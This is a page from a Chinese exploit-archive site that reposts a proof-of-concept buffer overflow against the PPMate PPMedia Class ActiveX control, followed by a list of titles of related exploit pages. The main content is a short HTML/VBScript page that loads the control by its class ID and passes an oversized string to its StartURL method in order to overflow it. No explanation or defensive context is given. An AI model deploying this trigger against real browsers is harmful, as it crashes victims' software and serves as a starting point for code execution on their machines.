手机
当前位置:查字典教程网 >网络安全 >Exploit >PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
摘要:arg1=String(10000,"A")target.StartURL(arg1)

<html>

<body> <object id=target

classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object>

<script language=vbscript> arg1=String(10000, "A")

target.StartURL(arg1) </script>

</body>

</html>

【PPMate PPMedia Class ActiveX Control Buffer Overflow PoC】相关文章:

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

Maian Events 2.0 Insecure Cookie Handling Vulnerability

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC

精品推荐
分类导航